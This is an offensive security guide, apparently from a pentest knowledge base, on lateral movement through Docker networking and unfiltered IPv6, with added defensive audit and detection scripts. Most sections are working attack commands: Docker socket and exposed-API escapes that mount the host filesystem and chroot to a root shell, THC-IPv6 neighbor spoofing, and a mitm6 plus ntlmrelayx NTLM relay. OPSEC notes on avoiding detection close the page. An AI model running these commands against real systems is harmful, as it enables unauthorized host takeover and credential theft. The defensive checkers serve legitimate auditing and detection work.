Docker and IPv6 Pivoting
# Overview
Two commonly overlooked pivot vectors: Docker networking (container-to-host, container-to-container) and IPv6 (often unfiltered by firewalls). Both provide lateral movement paths that defenders frequently miss.
# Docker Pivoting
## Docker Network Models
| Network Type | Scope | Pivoting Potential |
|---|---|---|
| bridge (default) | Container ↔ Container on same host | Medium |
| host | Container shares host network stack | High |
| overlay | Container ↔ Container across hosts | High |
| macvlan | Container gets its own MAC/IP | High |
| none | No networking | None |
## Container to Host
If you have shell access inside a container, escaping to the host network depends on the network mode.
```bash
# Check network mode: list the addresses visible in this network namespace
cat /proc/1/net/if_inet6 2>/dev/null && echo "IPv6 enabled"
cat /proc/net/fib_trie 2>/dev/null | grep "HOST LOCAL" -B1
# If host network mode: you're already on the host network
# Just scan directly:
nmap -sn 172.16.0.0/24
# If bridge mode: you're on a Docker bridge (usually 172.17.0.0/16)
# The host gateway is usually 172.17.0.1
ip route | grep default
# default via 172.17.0.1
# Scan the host
nmap -sn 172.17.0.1
# Scan the host's other networks (packets are routed via the default gateway;
# nmap's -g option sets the source port, not a gateway, so it is not used here)
nmap -sn 172.16.0.0/24 -e eth0
```
## Docker Socket Escape
If the Docker socket (/var/run/docker.sock) is mounted inside the container, you can create a new container with host networking.
```bash
# Check if Docker socket is mounted
ls -la /var/run/docker.sock
# Install Docker CLI inside container
curl -fsSL https://download.docker.com/linux/static/stable/x86_64/docker-24.0.7.tgz | tar xz
cp docker/docker /usr/local/bin/
# Create a container with host networking and the host filesystem mounted (full host access)
docker -H unix:///var/run/docker.sock run -it --network host -v /:/host alpine chroot /host /bin/bash
# Or mount only the host filesystem:
docker -H unix:///var/run/docker.sock run -it -v /:/host alpine chroot /host /bin/bash
```
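The same misconfigurations seen from the defender's side: an added audit script (not part of the original page) that reads `docker inspect` JSON and flags host networking, privileged containers, and bind mounts of the Docker socket or the host root. The JSON below is a constructed sample; in use, feed it the output of `docker inspect $(docker ps -aq)`.

```python
import json

# Constructed sample in the shape of `docker inspect` output (not a real host).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "HostConfig": {"NetworkMode": "bridge", "Privileged": False,
     "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]}},
    {"Name": "/agent", "HostConfig": {"NetworkMode": "host", "Privileged": True,
     "Binds": ["/:/host:ro"]}},
    {"Name": "/db", "HostConfig": {"NetworkMode": "bridge", "Privileged": False,
     "Binds": ["dbdata:/var/lib/postgresql/data"]}},
])

# Host paths that hand a container control of the host when bind-mounted.
SENSITIVE_SOURCES = ("/var/run/docker.sock", "/run/docker.sock", "/")

def audit_container(entry):
    """Return a list of findings for one `docker inspect` entry."""
    findings = []
    hc = entry.get("HostConfig", {})
    if hc.get("NetworkMode") == "host":
        findings.append("host network mode (container shares host network stack)")
    if hc.get("Privileged"):
        findings.append("privileged container")
    for bind in hc.get("Binds") or []:
        src = bind.split(":")[0]          # "source:target[:options]"
        if src in SENSITIVE_SOURCES:
            findings.append(f"sensitive bind mount: {bind}")
    return findings

def audit(inspect_json):
    """Map container name -> findings, for every container that has any."""
    report = {}
    for entry in json.loads(inspect_json):
        findings = audit_container(entry)
        if findings:
            report[entry["Name"].lstrip("/")] = findings
    return report

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```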
## Container-to-Container Lateral Movement
```bash
# From one container, discover other containers
# On the Docker bridge network:
arp-scan -l
nmap -sn 172.17.0.0/24
# If overlay network (multi-host Docker Swarm):
# Find overlay subnet
ip addr | grep -A2 docker_gwbridge
ip addr | grep -A2 overlay
# Scan overlay network
nmap -sn 10.0.0.0/24
```
## Docker API Pivot
```bash
# If the Docker API is exposed (port 2375/2376) on another host,
# use it to start a host-network container there with the host filesystem mounted
docker -H tcp://172.16.0.10:2375 run -it --network host -v /:/host alpine chroot /host /bin/bash
# List containers on remote Docker host
docker -H tcp://172.16.0.10:2375 ps -a
# Execute commands in existing containers
docker -H tcp://172.16.0.10:2375 exec -it <container_id> /bin/bash
```
# IPv6 Pivoting
IPv6 is often enabled but unfiltered. Many firewalls only filter IPv4, and IPv6 provides an alternate path to reach hosts that are otherwise blocked.
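An added check for exactly this IPv4/IPv6 filtering gap (example code, not from the original page): it parses `iptables-save` and `ip6tables-save` output and reports ports that INPUT drops or rejects over IPv4 but not over IPv6. The two rulesets are constructed samples; the check assumes explicit block rules, so a host that uses a default DROP policy with an allow-list would need the complementary comparison of ACCEPT rules.

```python
import re

# Constructed `iptables-save` sample: SSH, SMB and RDP are blocked over IPv4.
IPTABLES_V4 = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 445 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -p tcp -m tcp --dport 3389 -j DROP
COMMIT
"""

# Constructed `ip6tables-save` sample: only SSH is blocked over IPv6.
IPTABLES_V6 = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j DROP
COMMIT
"""

# Matches INPUT rules that drop/reject a single destination port.
RULE_RE = re.compile(r"^-A INPUT .*?-p (\w+) .*?--dport (\d+) .*?-j (DROP|REJECT)")

def blocked_ports(save_output):
    """Return the set of (proto, port) pairs dropped or rejected in INPUT."""
    blocked = set()
    for line in save_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            blocked.add((m.group(1), int(m.group(2))))
    return blocked

def parity_gaps(v4_output, v6_output):
    """Ports blocked over IPv4 but not IPv6, i.e. reachable via the IPv6 path."""
    return sorted(blocked_ports(v4_output) - blocked_ports(v6_output))

if __name__ == "__main__":
    for proto, port in parity_gaps(IPTABLES_V4, IPTABLES_V6):
        print(f"{proto}/{port} is filtered on IPv4 but open on IPv6")
```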
## IPv6 Discovery
```bash
# Check if IPv6 is enabled
ip -6 addr | grep inet6
cat /proc/sys/net/ipv6/conf/all/disable_ipv6   # 0 = enabled
# Discover IPv6 neighbors
ip -6 neighbor show
# Multicast discovery (find all IPv6 hosts on the link)
ping6 -c 5 ff02::1%eth0
# After ping6, check neighbor cache
ip -6 neighbor show
# Scan IPv6 subnet
nmap -6 -sn 2001:db8::/120
# With alive6 (from THC-IPv6 toolkit)
alive6 eth0
# With onetwopunch (IPv4 + IPv6 scanning)
# https://github.com/arch4ngel/onetwopunch
```
## THC-IPv6 Toolkit
```bash
# Install
apt install thc-ipv6
# Discover alive hosts
alive6 eth0
# Detect new IPv6 hosts appearing on the link
detect-new-ip6 eth0
# Neighbor Discovery (ND) spoofer (MITM)
parasite6 eth0
# DNS enumeration over IPv6
dnsdict6 -d4 -t10 domain.com
# Enumerate IPv6 addresses via reverse DNS (first argument is the DNS server to query)
dnsrevenum6 domain.com 2001:db8::/64
```
## mitm6 (IPv6 MITM)
mitm6 exploits Windows' preference for IPv6 over IPv4 to perform man-in-the-middle attacks.
```bash
# Install
pip3 install mitm6
# Basic MITM — respond to DHCPv6 requests, become DNS server
sudo mitm6 -d targetdomain.local
# Target specific host
sudo mitm6 -d targetdomain.local --target 2001:db8::100
# mitm6 + ntlmrelayx (relay NTLM auth)
# Terminal 1:
sudo mitm6 -d targetdomain.local
# Terminal 2:
ntlmrelayx.py -6 -t ldaps://dc.targetdomain.local -wh attacker.domain.com -l /tmp/loot
```
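mitm6 works by answering DHCPv6 and handing out its own address as the DNS server, which is what network monitoring can key on. An added detector (not code from mitm6 or the original page) parses DHCPv6 ADVERTISE/REPLY messages and flags any OPTION_DNS_SERVERS (option 23) entry that is not on an allow-list of legitimate resolvers; `2001:db8::53` and the sample messages are constructed test fixtures.

```python
import ipaddress
import struct

ADVERTISE, REPLY = 2, 7          # server-side DHCPv6 message types (RFC 8415)
OPTION_DNS_SERVERS = 23          # OPTION_DNS_SERVERS (RFC 3646)

def parse_dhcpv6(data):
    """Return (msg_type, {option_code: [raw option values]})."""
    msg_type = data[0]
    options = {}
    pos = 4  # skip msg-type (1 byte) and transaction-id (3 bytes)
    while pos + 4 <= len(data):
        code, length = struct.unpack("!HH", data[pos:pos + 4])
        value = data[pos + 4:pos + 4 + length]
        if len(value) != length:
            raise ValueError("truncated DHCPv6 option")
        options.setdefault(code, []).append(value)
        pos += 4 + length
    return msg_type, options

def advertised_dns_servers(data):
    """IPv6 resolvers an ADVERTISE/REPLY pushes to the client (else [])."""
    msg_type, options = parse_dhcpv6(data)
    if msg_type not in (ADVERTISE, REPLY):
        return []
    servers = []
    for value in options.get(OPTION_DNS_SERVERS, []):
        for i in range(0, len(value) - len(value) % 16, 16):  # 16 bytes each
            servers.append(ipaddress.IPv6Address(value[i:i + 16]))
    return servers

def rogue_dns_servers(data, allowed):
    """Resolvers in the message that are not on the allow-list."""
    allowed = {ipaddress.IPv6Address(a) for a in allowed}
    return [s for s in advertised_dns_servers(data) if s not in allowed]

def build_message(msg_type, dns_servers):
    """Constructed test fixture: a minimal message carrying only option 23."""
    payload = b"".join(ipaddress.IPv6Address(s).packed for s in dns_servers)
    header = bytes([msg_type]) + b"\x00\x00\x01"  # transaction-id 0x000001
    return header + struct.pack("!HH", OPTION_DNS_SERVERS, len(payload)) + payload

# Constructed samples: the legitimate resolver vs. an unknown link-local one.
LEGIT_DNS = ["2001:db8::53"]
GOOD_ADVERTISE = build_message(ADVERTISE, LEGIT_DNS)
BAD_ADVERTISE = build_message(ADVERTISE, ["fe80::1234"])

if __name__ == "__main__":
    print([str(s) for s in rogue_dns_servers(BAD_ADVERTISE, LEGIT_DNS)])
```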
## IPv6 Tunnel Through IPv4 Network
When IPv6 is not natively available but the target network uses IPv6 internally, create an IPv6-over-IPv4 tunnel.
```bash
# 6in4 tunnel (Linux)
ip tunnel add tun6in4 mode sit remote <pivot_ip> local <your_ip> ttl 255
ip link set tun6in4 up
ip addr add 2001:db8::1/64 dev tun6in4
ip -6 route add 2001:db8::/64 dev tun6in4
# Teredo tunnel (if 6in4 blocked)
apt install miredo
miredo
ip -6 addr | grep teredo
# 6to4 tunnel (public relay)
ip tunnel add 6to4 mode sit remote any local <your_public_ip>
ip link set 6to4 up
ip addr add 2002:<hex_ip>::1/16 dev 6to4
ip -6 route add 2002::/16 dev 6to4
```
## IPv6 Firewall Bypass
```bash
# If IPv4 is firewalled but IPv6 is not, switch tools to IPv6
nmap -6 -sT 2001:db8::10 -p 22,80,443,445
# SSH over IPv6
ssh -6 user@2001:db8::10
# Curl over IPv6
curl -6 http://[2001:db8::10]/
# Raw TCP connection to port 80 over IPv6 with ncat
ncat -6 2001:db8::10 80
# SMB over IPv6
smbclient //[2001:db8::10]/share -U user
```
# Common Pitfalls
- Docker bridge isolation: By default, Docker bridge networks isolate containers. You can't reach the host directly without additional configuration or the host network mode.
- IPv6 link-local only: Some hosts only have link-local IPv6 (fe80::/10). You need to be on the same link to reach them.
- Docker socket permissions: You need root or docker group membership to use the Docker socket.
- IPv6 privacy addresses: Windows and some Linux hosts use temporary IPv6 addresses that change over time. Use stable addresses when possible.
- Overlay network encryption: Docker overlay networks can be encrypted. Without the key, you can't intercept overlay traffic.
# OPSEC Considerations
- Docker socket access is heavily monitored in production environments
- Creating new containers is logged by Docker and visible in `docker ps`
- IPv6 multicast discovery (ff02::1) is visible to any IPv6-aware IDS
- mitm6 creates DHCPv6 responses that may be detected by network monitoring
- THC-IPv6 tools generate noisy traffic — use selectively
# Cross-References
- Network Enumeration — Interface and route discovery (IPv4 + IPv6)
- Platform Strategies — Which tools work on which OS
- 09 - Lateral Movement — Container lateral movement